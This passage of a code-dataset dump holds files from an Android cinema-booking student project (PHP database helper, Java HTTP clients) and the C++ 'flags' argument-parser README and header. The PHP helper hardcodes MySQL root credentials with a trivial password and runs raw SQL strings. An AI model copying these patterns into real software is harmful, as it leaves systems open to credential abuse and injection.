values.push_back(value);\n } else {\n values.push_back(std::nullopt);\n }\n }\n return values;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::vector<std::optional<std::string_view>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n return get_values(options, option);\n}\n\ntemplate <>\ninline std::vector<std::optional<std::string>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n const auto views = get_values(options, option);\n std::vector<std::optional<std::string>> values(views.begin(), views.end());\n return values;\n}\n\n// Special case for booleans: if the value is in the falsities array (see get<bool>)\n// the option will be considered falsy. 
Otherwise, it will be considered truthy just\n// for being present.\ntemplate <>\ninline std::vector<std::optional<bool>> get_multiple(\n const argument_map& options, const std::string_view& option) {\n const auto views = get_values(options, option);\n std::vector<std::optional<bool>> values;\n for (const auto view : views) {\n if (!view) {\n values.push_back(true);\n continue;\n }\n values.push_back(std::none_of(falsities.begin(), falsities.end(),\n [&view](auto falsity) { return view == falsity; }));\n }\n return values;\n}\n\n// Coerces the string value of the given positional index into <T>.\n// If the value cannot be properly parsed or the key does not exist, returns\n// nullopt.\ntemplate <class T>\nstd::optional<T> get(const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n if (T value; std::istringstream(\n std::string(positional_arguments[positional_index])) >>\n value)\n return value;\n }\n return std::nullopt;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::optional<std::string_view> get(\n const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n return positional_arguments[positional_index];\n }\n return std::nullopt;\n}\n\ntemplate <>\ninline std::optional<std::string> get(\n const std::vector<std::string_view>& positional_arguments,\n size_t positional_index) {\n if (positional_index < positional_arguments.size()) {\n return std::string(positional_arguments[positional_index]);\n }\n return std::nullopt;\n}\n} // namespace detail\n\nstruct args {\n args(const int argc, char** argv) : parser_(argc, argv) {}\n\n template <class T>\n std::optional<T> get(const std::string_view& option) const {\n return detail::get<T>(parser_.options(), option);\n }\n\n template <class T>\n T get(const std::string_view& option, T&& default_value) const {\n return get<T>(option).value_or(default_value);\n }\n\n template <class T>\n std::vector<std::optional<T>> get_multiple(const std::string_view& option) const {\n return detail::get_multiple<T>(parser_.options(), option);\n }\n\n template <class T>\n std::vector<T> get_multiple(const std::string_view& option, T&& default_value) const {\n const auto items = get_multiple<T>(option);\n std::vector<T> values;\n values.reserve(items.size());\n for(const auto& item : items) {\n values.push_back(item ? 
*item : default_value);\n }\n return values;\n }\n\n template <class T>\n std::optional<T> get(size_t positional_index) const {\n return detail::get<T>(parser_.positional_arguments(), positional_index);\n }\n\n template <class T>\n T get(size_t positional_index, T&& default_value) const {\n return get<T>(positional_index).value_or(default_value);\n }\n\n const std::vector<std::string_view>& positional() const {\n return parser_.positional_arguments();\n }\n\n private:\n const detail::parser parser_;\n};\n\n} // namespace flags\n\n#endif // FLAGS_H_\n" }, { "alpha_fraction": 0.5958549380302429, "alphanum_fraction": 0.6148532032966614, "avg_line_length": 23.125, "blob_id": "bb4637b84b4338aadc85f41c8d9d4ce4ae7d23c5", "content_id": "d0cd5f4b694b67339eb11bb601f116aa0a1322d2", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "permissive", "max_line_length": 74, "num_lines": 24, "path": "/build.bfg", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "# -*- python -*-\n\nimport os\nfrom os.path import splitext\n\nbfg9000_required_version('>=0.2.0')\nproject('flags', version='1.0pre')\n\nglobal_options(['-std=c++1z', '-Wall', '-Wextra', '-Werror', '-pedantic'],\n lang='c++')\nmettle = package('mettle')\nincludes = header_directory('include', include='*.h')\ndriver = test_driver(\n 'mettle -o verbose'\n)\n\nfor src in find_files('test/*.cc'):\n path = os.path.join('test', src.path.basename())\n test(executable(\n splitext(path)[0],\n files=[path],\n includes=includes,\n packages=mettle,\n ), driver=driver)\n" }, { "alpha_fraction": 0.6055071353912354, "alphanum_fraction": 0.6157055497169495, "avg_line_length": 39.09665298461914, "blob_id": "a8657efb16862ef71ab1ed63a2c5cee42fd456d2", "content_id": "e40a88c73caed3f694b4c123b76d93594841b5f4", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10786, "license_type": "permissive", "max_line_length": 82, "num_lines": 269, "path": "/test/flags.cc", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "#include \"flags.h\"\n\n#include <array>\n#include <mettle.hpp>\n#include <stdexcept>\n#include <string>\n#include <string_view>\n#include <cstring>\n#include <algorithm>\n\nusing namespace mettle;\n\nnamespace {\n// TODO: Initialize argv into unique_ptr so RAII can take care of everything.\n// Currently C-style initialization and deletion purely out of laziness. 
:(\n\n// Allocates a position within argv and copies the given view to it.\n// argv must already be allocated.\nvoid initialize_arg(char** argv, const size_t index,\n const std::string_view& view) {\n argv[index] =\n reinterpret_cast<char*>(malloc((view.size() + 1) * sizeof(char)));\n memcpy(argv[index], view.data(), view.size() + 1);\n}\n\n// Allocates all of argv from the given argument array.\n// - argv[0] will always be TEST, there is no need to pass a program argument.\n// - argv(0, N) will contain the passed in array.\n// - argv[N] will always be NULL.\n// argv's final size will be the array's size plus two due to the first and last\n// conditions.\nchar** initialize_argv(const std::initializer_list<const char*> args) {\n char** argv =\n reinterpret_cast<char**>(malloc((args.size() + 2) * sizeof(char*)));\n initialize_arg(argv, 0, \"TEST\");\n std::size_t i = 0;\n for (const auto& arg : args) {\n initialize_arg(argv, ++i, arg);\n }\n argv[args.size() + 1] = NULL;\n return argv;\n}\n\n// Same as above but using a std::vector\nchar** initialize_argv(const std::vector<const char*>& args) {\n char** argv =\n reinterpret_cast<char**>(malloc((args.size() + 2) * sizeof(char*)));\n initialize_arg(argv, 0, \"TEST\");\n std::size_t i = 0;\n for (const auto& arg : args) {\n initialize_arg(argv, ++i, arg);\n }\n argv[args.size() + 1] = NULL;\n return argv;\n}\n\n// Cleans up every item within argv, then argv itself.\nvoid cleanup_argv(char** argv) {\n size_t index = 0;\n while (argv[index]) delete[] argv[index++];\n delete argv;\n}\n} // namespace\n\n// Simple fixture for (de)allocating argv and initalizing flags::args.\nstruct args_fixture {\n static args_fixture create(const std::initializer_list<const char*> args) {\n return {args.size(), initialize_argv(args)};\n }\n static args_fixture create(const std::vector<const char*>& args) {\n return {args.size(), initialize_argv(args)};\n }\n ~args_fixture() { cleanup_argv(argv_); }\n\n size_t argc() const { return argc_; }\n const flags::args& args() const { return args_; }\n std::string argv(const size_t index) const {\n if (index >= argc_) throw std::out_of_range(\"index larger than argc\");\n return argv_[index];\n };\n\n private:\n args_fixture(const size_t argc, char** argv)\n : argc_(argc + 1 /* for program */), argv_(argv), args_(argc_, argv) {}\n const size_t argc_;\n char** argv_;\n const flags::args args_;\n};\n\nsuite<> positional_arguments(\"positional arguments\", [](auto& _) {\n // Lack of positional arguments.\n _.test(\"absence\", []() {\n const auto fixture =\n args_fixture::create({\"--no\", \"positional\", \"--arguments\"});\n expect(fixture.args().positional().size(), equal_to(0));\n expect(fixture.args().get<int>(0), equal_to(std::nullopt));\n expect(fixture.args().get<int>(0, 3), equal_to(3));\n });\n\n // Testing the existence of positional arguments with no options or flags.\n _.test(\"basic\", []() {\n const auto fixture = args_fixture::create({\"positional\", \"arguments\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n 
expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding options to the mix.\n _.test(\"with options\", []() {\n const auto fixture = args_fixture::create(\n {\"positional\", \"arguments\", \"-with\", \"--some\", \"---options\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding flags to the mix.\n _.test(\"with flags\", []() {\n const auto fixture = args_fixture::create(\n {\"--flag\", \"\\\"not positional\\\"\", \"positional\", \"--another-flag\", \"foo\",\n \"arguments\", \"--bar\", \"42\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding both flags and options.\n _.test(\"with flags and options\", []() {\n const auto fixture = args_fixture::create(\n {\"--flag\", \"\\\"not positional\\\"\", \"positional\", \"--another-flag\", \"foo\",\n \"arguments\", \"--bar\", \"42\", \"--some\", \"--options\", \"--foobaz\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n});\n\nsuite<> flag_parsing(\"flag parsing\", [](auto& _) {\n // Basic bool parsing.\n _.test(\"bool\", []() {\n const auto fixture =\n args_fixture::create({\"--foo\", \"1\", \"--bar\", \"no\", \"--verbose\"});\n expect(*fixture.args().get<bool>(\"foo\"), equal_to(true));\n expect(fixture.args().get<bool>(\"foo\", false), equal_to(true));\n expect(*fixture.args().get<bool>(\"bar\"), equal_to(false));\n expect(*fixture.args().get<bool>(\"verbose\"), equal_to(true));\n 
expect(fixture.args().get<bool>(\"nonexistent\"), equal_to(std::nullopt));\n });\n\n // Verifying all the falsities are actually false.\n _.test(\"falsities\", []() {\n for (const auto falsity : flags::detail::falsities) {\n const auto fixture = args_fixture::create({\"--foo\", falsity});\n expect(*fixture.args().get<bool>(\"foo\"), equal_to(false));\n expect(fixture.args().get<bool>(\"foo\", true), equal_to(false));\n }\n });\n\n // Complex strings are succesfully parsed.\n _.test(\"string\", []() {\n constexpr char LOREM_IPSUM[] =\n \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do \"\n \"eiusmod tempor incididunt ut labore et dolore magna aliqua.\";\n const auto fixture = args_fixture::create({\"--foo\", LOREM_IPSUM});\n expect(*fixture.args().get<std::string>(\"foo\"),\n equal_to(std::string(LOREM_IPSUM)));\n });\n\n // Empty values\n _.test(\"empty\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"\"});\n expect(*fixture.args().get<std::string>(\"foo\"), equal_to(\"\"));\n });\n\n // Multiple values for one flag\n _.test(\"multiple\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"bar\", \"--foo\", \"baz\"});\n auto foo = fixture.args().get_multiple<std::string>(\"foo\");\n expect(foo.size(), equal_to(2));\n expect(foo[0].value(), equal_to(\"bar\"));\n expect(foo[1].value(), equal_to(\"baz\"));\n });\n\n _.test(\"multiple with type\", [](){\n const auto fixture = args_fixture::create({\"-x\", \"-x\", \"1\", \"-x\", \"2\"});\n auto x = fixture.args().get_multiple<int>(\"x\", 0);\n expect(x.size(), equal_to(3));\n expect(x[0], equal_to(0));\n expect(x[1], equal_to(1));\n expect(x[2], equal_to(2));\n });\n\n _.test(\"multiple falsities\", [](){\n std::vector<const char*> args;\n for (const auto falsity : flags::detail::falsities) {\n args.push_back(\"--foo\");\n args.push_back(falsity);\n }\n const auto fixture = args_fixture::create(args);\n const auto foos1 = fixture.args().get_multiple<bool>(\"foo\");\n for (const auto& foo : foos1) {\n expect(foo && *foo, equal_to(false));\n }\n const auto foos2 = fixture.args().get_multiple<bool>(\"foo\", true);\n for (const auto& foo : foos2) {\n expect(foo, equal_to(false));\n }\n });\n\n _.test(\"multiple valueless flags\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"-foo\", \"--foo\", \"-foo\"});\n const auto foos = fixture.args().get_multiple<bool>(\"foo\");\n expect(foos.size(), equal_to(4));\n for (const auto& foo : foos) {\n expect(static_cast<bool>(foo), equal_to(true));\n }\n });\n\n // Basic number parsing. 
Verifying ints are truncated and doubles are\n // succesfully parsed.\n _.test(\"numbers\", []() {\n const auto fixture =\n args_fixture::create({\"--foo\", \"42\", \"--bar\", \"42.42\"});\n expect(*fixture.args().get<int>(\"foo\"), equal_to(42));\n expect(*fixture.args().get<double>(\"foo\"), equal_to(42));\n expect(*fixture.args().get<int>(\"bar\"), equal_to(42));\n expect(*fixture.args().get<double>(\"bar\"), equal_to(42.42));\n expect(fixture.args().get<int>(\"foobar\", 42), equal_to(42));\n expect(fixture.args().get<double>(\"foobar\", 42.4242), equal_to(42.4242));\n expect(fixture.args().get<int>(\"foobar\"), equal_to(std::nullopt));\n expect(fixture.args().get<double>(\"foobar\"), equal_to(std::nullopt));\n });\n});\n" }, { "alpha_fraction": 0.7082551717758179, "alphanum_fraction": 0.7129455804824829, "avg_line_length": 35.13559341430664, "blob_id": "288024dcdf293ff385a6bd2ae919f9cac0ae2df6", "content_id": "20c680fbbb2c7d85eac0ab2e56fb89e91e076cd6", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 2132, "license_type": "permissive", "max_line_length": 92, "num_lines": 59, "path": "/CMakeLists.txt", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.12)\n\nproject(\n flags\n VERSION\n 1.0.0\n DESCRIPTION\n \"Simple, extensible, header-only C++17 argument parser released into the public domain.\"\n HOMEPAGE_URL\n \"https://github.com/sailormoon/flags\")\n\nadd_library(${PROJECT_NAME} INTERFACE)\n\n# Add alias so the project can be used with add_subdirectory\nadd_library(${PROJECT_NAME}::${PROJECT_NAME} ALIAS ${PROJECT_NAME})\n\ninclude(GNUInstallDirs)\n\n# Adding the install interface generator expression makes sure that the include\n# files are installed to the proper location (provided by GNUInstallDirs)\ntarget_include_directories(\n ${PROJECT_NAME}\n INTERFACE $<BUILD_INTERFACE:${${PROJECT_NAME}_SOURCE_DIR}/include>\n $<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)\n\ntarget_compile_features(${PROJECT_NAME} INTERFACE cxx_std_17)\n\n# Locations are provided by GNUInstallDirs\ninstall(TARGETS ${PROJECT_NAME}\n EXPORT ${PROJECT_NAME}_Targets\n ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}\n LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR}\n RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})\n\ninclude(CMakePackageConfigHelpers)\nwrite_basic_package_version_file(\"${PROJECT_NAME}ConfigVersion.cmake\"\n VERSION ${PROJECT_VERSION}\n COMPATIBILITY SameMajorVersion)\n\nconfigure_package_config_file(\n \"${PROJECT_SOURCE_DIR}/cmake/${PROJECT_NAME}Config.cmake.in\"\n \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}Config.cmake\"\n INSTALL_DESTINATION\n ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(EXPORT ${PROJECT_NAME}_Targets\n FILE ${PROJECT_NAME}Targets.cmake\n NAMESPACE ${PROJECT_NAME}::\n DESTINATION ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(FILES \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}Config.cmake\"\n \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}ConfigVersion.cmake\"\n DESTINATION ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(DIRECTORY ${PROJECT_SOURCE_DIR}/include/${PROJECT_NAME} DESTINATION include)\n\nset(CPACK_RESOURCE_FILE_LICENSE \"${PROJECT_SOURCE_DIR}/LICENSE\")\n\ninclude(CPack)\n" } ]
5
Hororohoruru/Python-mail-database
https://github.com/Hororohoruru/Python-mail-database
74f617e5a761fc68bf629e816fa9ca3b926acd26
7c8f0fa6be8b89ade9724588ba73eef80a88df6b
c8cd0944863da526f2729f258c49199418fdb586
refs/heads/master
2021-04-30T08:33:59.908815
2018-02-13T12:23:26
2018-02-13T12:23:26
121,379,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7937062978744507, "alphanum_fraction": 0.7972028255462646, "avg_line_length": 46.66666793823242, "blob_id": "f328fb18d4d58304cfb26de095eb4de5bd92840d", "content_id": "c9dc487668d10bda974163ec8c1d7ea8de02bed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 286, "license_type": "no_license", "max_line_length": 129, "num_lines": 6, "path": "/README.md", "repo_name": "Hororohoruru/Python-mail-database", "src_encoding": "UTF-8", "text": "# Python-mail-database\n\nThis program allows the user to create a simple database with names and e-mails and store them in a csv file.\n\nThis program is inspired by the project of the 4th week of the Coursera course \"Python programming: a concise introduction\", from\nWesleyan University.\n" }, { "alpha_fraction": 0.51609867811203, "alphanum_fraction": 0.5200939774513245, "avg_line_length": 26.3799991607666, "blob_id": "d0c455bbdbd269d49e552f3859e262f7e19bda22", "content_id": "7e1f9bcc18b622dd5a1a2c0984bd5ef23303b659", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4255, "license_type": "no_license", "max_line_length": 78, "num_lines": 150, "path": "/mail_database.py", "repo_name": "Hororohoruru/Python-mail-database", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis program allows the user to create a small database containing names\r\nand e-mail directions. The user will be able to add, delete and edit new\r\nentries via the menu, and store the database in a csv file\r\n\"\"\"\r\nimport os\r\nimport csv\r\n\r\n\r\nmails = []\r\nname_pos = 0\r\nmail_pos = 1\r\nmail_header = ['Name', 'Mail']\r\n\r\n\r\ndef valid_menu_choice(which):\r\n if not which.isdigit():\r\n print(which + \"needs to be the number of an entry\")\r\n return False\r\n which = int(which)\r\n if which < 1 or which > len(mails):\r\n print(str(which) + \"needs to be the number of an entry\")\r\n return False\r\n return True\r\n\r\ndef delete_mail(which):\r\n if not valid_menu_choice(which):\r\n return\r\n which = int(which)\r\n del mails[which - 1]\r\n print(\"Deleted entry number\",which)\r\n print()\r\n \r\ndef edit_mail(which):\r\n if not valid_menu_choice(which):\r\n return\r\n which = int(which)\r\n \r\n mail = mails[which - 1]\r\n print(\"Enter the data for a new entry. 
Press <enter> to leave un changed\")\r\n \r\n print()\r\n print(\"Current name for this entry is '\",mail[name_pos], \"'\")\r\n newname = input(\"Enter new name or press return: \")\r\n if newname == \"\":\r\n newname = mail[name_pos]\r\n \r\n print()\r\n print(\"Current mail address for this entry is '\",mail[mail_pos],\"'\")\r\n new_mail = input(\"Enter new mail or press return: \")\r\n if new_mail == \"\":\r\n new_mail = mail[mail_pos]\r\n \r\n mail = [newname, new_mail]\r\n mails[which - 1] = mail\r\n \r\n print()\r\n print(\"The mail for the entry\",which,\"has been updated to:\")\r\n print(\"Name: \",newname)\r\n print(\"Mail: \",new_mail)\r\n print()\r\n \r\ndef load_mail_list():\r\n if os.access(\"mail_list.csv\",os.F_OK):\r\n f = open(\"mail_list.csv\")\r\n for row in csv.reader(f):\r\n mails.append(row)\r\n f.close()\r\n \r\ndef save_mail_list():\r\n f = open(\"mail_list.csv\", 'w', newline ='')\r\n for entry in mails:\r\n csv.writer(f).writerow(entry)\r\n f.close()\r\n \r\ndef show_mails():\r\n print()\r\n show_mail(mail_header, \"\")\r\n index = 1\r\n for mail in mails:\r\n show_mail(mail, index)\r\n index += 1\r\n print()\r\n \r\ndef show_mail(mail, index):\r\n outputstr = \"{0:>3} {1:<20} {2:<32}\"\r\n print(outputstr.format(index, mail[name_pos], mail[mail_pos]))\r\n \r\ndef create_mail():\r\n print(\"Creating a new mail entry. Please enter the data below:\")\r\n newname = input(\"Please, enter the name: \")\r\n new_mail = input(\"Please, enter the mail address: \")\r\n mail = [newname, new_mail]\r\n mails.append(mail)\r\n print()\r\n print(\"The mail entry for\",newname,\"has been added successfully\")\r\n print()\r\n \r\ndef menu_choice():\r\n \"\"\" Menu with program options \"\"\"\r\n print(\"Please choose one of the following options:\")\r\n print(\" s) Show\")\r\n print(\" n) New\")\r\n print(\" e) Edit\")\r\n print(\" d) Delete\")\r\n print(\" q) Quit\")\r\n choice = input(\"Your choice: \")\r\n if choice.lower() in [\"s\", \"n\", \"d\", \"e\", \"q\"]:\r\n return choice.lower()\r\n else:\r\n print(choice,\" is not a valid option. Please, try again\")\r\n return None\r\n \r\ndef main_loop():\r\n \r\n load_mail_list()\r\n \r\n while True:\r\n choice = menu_choice()\r\n if choice == None:\r\n continue\r\n elif choice == \"q\":\r\n print(\"Exiting...\")\r\n break\r\n elif choice == \"s\":\r\n show_mails()\r\n elif choice == \"n\":\r\n create_mail()\r\n elif choice == \"e\":\r\n input_ = (\"Which item do you want to edit? (Press \"\r\n \"q to go back to the menu) \")\r\n which = input(input_)\r\n if which.lower() == \"q\":\r\n print()\r\n continue\r\n edit_mail(which)\r\n elif choice == \"d\":\r\n input_ = (\"Which item do you want to delete? (Press \"\r\n \"q to go back to the menu) \")\r\n which = input(input_)\r\n if which.lower() == \"q\":\r\n print()\r\n continue\r\n delete_mail(which)\r\n \r\n save_mail_list() \r\n \r\nif __name__ == '__main__':\r\n main_loop()" } ]
2
wsnijder/PycharmProjects
https://github.com/wsnijder/PycharmProjects
7596b0029c2065a23144c8f71bf57af1a2bec74c
48633c2b00aea1db669076dba4a15ca3fcdd52e6
3cb8fe6846c592939c52ae056212fb70cf9f03e9
refs/heads/master
2023-01-10T13:44:15.913635
2020-11-06T20:26:11
2020-11-06T20:26:11
299,880,729
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7237762212753296, "alphanum_fraction": 0.7342657446861267, "avg_line_length": 18.066667556762695, "blob_id": "8655e63d1edbe2d8795e6e7ae22e22aea463b804", "content_id": "a505d2881d95e0b478071710df1ea87c94cdeb48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 66, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "# two turtles created\n\nimport turtle\n\ntess = turtle.Turtle()\nalex = tess\nalex.color(\"hotpink\")\n\nif tess is alex:\n print(\"there is one turtle created\")\nelse: print(\"there are two turtles created\")\n\n# color applies to both turtles since it is aliased and not cloned\n\nalex.forward(100)\n" }, { "alpha_fraction": 0.5668449401855469, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 18.736841201782227, "blob_id": "53ee20530a32cd38fead706db0df98b939c4a62f", "content_id": "a38e6f1065cdb439c9a733a121237544041cc37d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/Week 4 python/exercise 3.4.4.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "arrival = int(input(\"On what day do you arrive?\"))\nstaying = int(input(\"What is the length of your stay?\"))\n\ndag = (arrival+staying)%7\n\nif dag == 0:\n print(\"Sunday\")\nif dag == 1:\n print(\"Monday\")\nif dag == 2:\n print(\"Tuesday\")\nif dag == 3:\n print(\"Wednesday\")\nif dag == 4:\n print(\"Thursday\")\nif dag == 5:\n print(\"Friday\")\nif dag == 6:\n print(\"Saturday\")" }, { "alpha_fraction": 0.7127071619033813, "alphanum_fraction": 0.7127071619033813, "avg_line_length": 21.75, "blob_id": "4c08218e1d5b5d990201ece28d832f7453684866", "content_id": "305459e4c3ab2400f1f0f64b722eaf7a27e18b52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 42, "num_lines": 8, "path": "/Week_6_Python/Exercise_1/5.1.19.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def count_letters(word):\n result = len(word)\n return result\n\n\nanswer = str(input(\"name a word\"))\ncalculation = count_letters(answer)\nprint(\"number of letters is\", calculation)" }, { "alpha_fraction": 0.6540540456771851, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 25.285715103149414, "blob_id": "8e685d1337de9d07a0adce2fce008c64f3dcb9c8", "content_id": "20370b95099c4f19e94e28337cba26d31a2a258a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 45, "num_lines": 7, "path": "/Week_6_Python/Exercise 3/5.3.23.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def scalar_mult(scalar, vector):\n outcomevector = []\n for element in vector:\n outcomevector.append(scalar * vector)\n return outcomevector\n\nprint(scalar_mult(3, [1,2]))\n\n" }, { "alpha_fraction": 0.6176470518112183, "alphanum_fraction": 0.625668466091156, "avg_line_length": 27.730770111083984, "blob_id": "0109dbe6823a8eb099bc1df61ad338db43c0db46", "content_id": "187b93ff798d19821be94f2b3d390e9772fd5482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, 
"license_type": "no_license", "max_line_length": 119, "num_lines": 26, "path": "/Week_6_Python/Exercise 3/practicing.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "horsemen = [\"war\", \"famine\", \"pestilence\", \"death\"]\nfor i in range(len(horsemen)):\n print(horsemen[i])\n\nfor words in horsemen:\n print(words)\n\nstudents = [(\"John\", [\"CompSci\", \"Physics\"]),(\"Vusi\", [\"Maths\", \"CompSci\", \"Stats\"]),(\"Jess\", [\"CompSci\", \"Accounting\",\n\"Economics\", \"Management\"]),(\"Sarah\", [\"InfSys\", \"Accounting\", \"Economics\", \"CommLaw\"]),(\"Zuki\", [\"Sociology\",\n\"Economics\", \"Law\", \"Stats\", \"Music\"])]\n\ncounter = 0\nfor name, subjects in students:\n if \"Economics\" in subjects:\n counter += 1\n\nprint(\"The number of students taking Economics is\", counter)\n\ndeel1 = [\"alpha\", \"beta\", \"gamma\"]\ndeel2 = [\"is niks\"]\nsamen = deel1 + deel2\nprint(samen)\n\nfriends = [\"Ren\", \"Den\", \"maatje\"]\nfor friend in friends:\n print(friend)\n\n" }, { "alpha_fraction": 0.5816993713378906, "alphanum_fraction": 0.6209150552749634, "avg_line_length": 16.11111068725586, "blob_id": "0b0dc5e698764cfc7c5bf281e40aedd8865bbb1e", "content_id": "9b070083d2ee80e992a55929b9a02ac177cf7db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 49, "num_lines": 9, "path": "/Week 4 python/exercise 3.4.4.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "exammark= float(input(\"What is your exam mark?\"))\n\nif exammark >=75:\n print(\"First\")\n\nif 70 <= exammark < 75:\n print(\"Upper second\")\n\n#And so on..." }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.5106382966041565, "avg_line_length": 10.75, "blob_id": "8218179d9cdeac85a3a5e6e128b5dde15e509be4", "content_id": "22f206ca4f3a5c68932c6eb4b3213303a08b61d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/Week 4 python/exercise 3.4.4.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "#b<=a\n#b<a\n#a<18 and day!=3\n# a<18 and day ==3\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 24.75, "blob_id": "cd99b1ce969c42bb7e1d818b212bd1b79d0ee08d", "content_id": "52f30c0be4b5b47a675c973253880e6e4f7943be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/Week 4 python/exercise 3.4.4.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "# 1 equals, true\n# 2 doest not equal, false\n# 3 greater or equal than, false\n# 4 